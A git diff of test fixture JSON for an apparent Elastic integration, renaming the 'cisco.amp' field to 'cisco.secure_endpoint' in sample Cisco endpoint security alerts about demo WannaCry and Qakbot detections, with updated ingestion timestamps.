                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4051,7 +4051,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -4113,7 +4113,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929558092Z",
+                "ingested": "2021-09-27T00:42:13.513752305Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -4123,7 +4123,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4184,7 +4184,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929559962Z",
+                "ingested": "2021-09-27T00:42:13.513754046Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4194,7 +4194,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -4259,7 +4259,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:42.929561869Z",
+                "ingested": "2021-09-27T00:42:13.513755889Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4269,7 +4269,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
index a95a5b457b6..419ad65737f 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp7.log-expected.json
@@ -28,7 +28,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452466436Z",
+                "ingested": "2021-09-27T00:42:26.818478679Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -38,7 +38,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -115,7 +115,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452471500Z",
+                "ingested": "2021-09-27T00:42:26.818482942Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -126,7 +126,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -200,7 +200,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452473667Z",
+                "ingested": "2021-09-27T00:42:26.818484826Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -211,7 +211,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -289,7 +289,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452475720Z",
+                "ingested": "2021-09-27T00:42:26.818486612Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -300,7 +300,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Variant:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -378,7 +378,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452477766Z",
+                "ingested": "2021-09-27T00:42:26.818488381Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -389,7 +389,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -451,7 +451,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452479754Z",
+                "ingested": "2021-09-27T00:42:26.818490142Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -461,7 +461,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -522,7 +522,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452481714Z",
+                "ingested": "2021-09-27T00:42:26.818491873Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -532,7 +532,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -597,7 +597,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452483701Z",
+                "ingested": "2021-09-27T00:42:26.818493608Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -607,7 +607,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -684,7 +684,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:55.452485647Z",
+                "ingested": "2021-09-27T00:42:26.818495354Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -695,7 +695,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -763,7 +763,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452487619Z",
+                "ingested": "2021-09-27T00:42:26.818497077Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -774,7 +774,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.GenericKD:Gen.20fu.1201",
                     "computer": {
                         "active": true,
@@ -842,7 +842,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-13T18:07:55.452489569Z",
+                "ingested": "2021-09-27T00:42:26.818498827Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -853,7 +853,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.12081E6CA3-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -922,7 +922,7 @@
             },
             "event": {
                 "severity": 4,
-                "ingested": "2021-09-13T18:07:55.452491758Z",
+                "ingested": "2021-09-27T00:42:26.818500718Z",
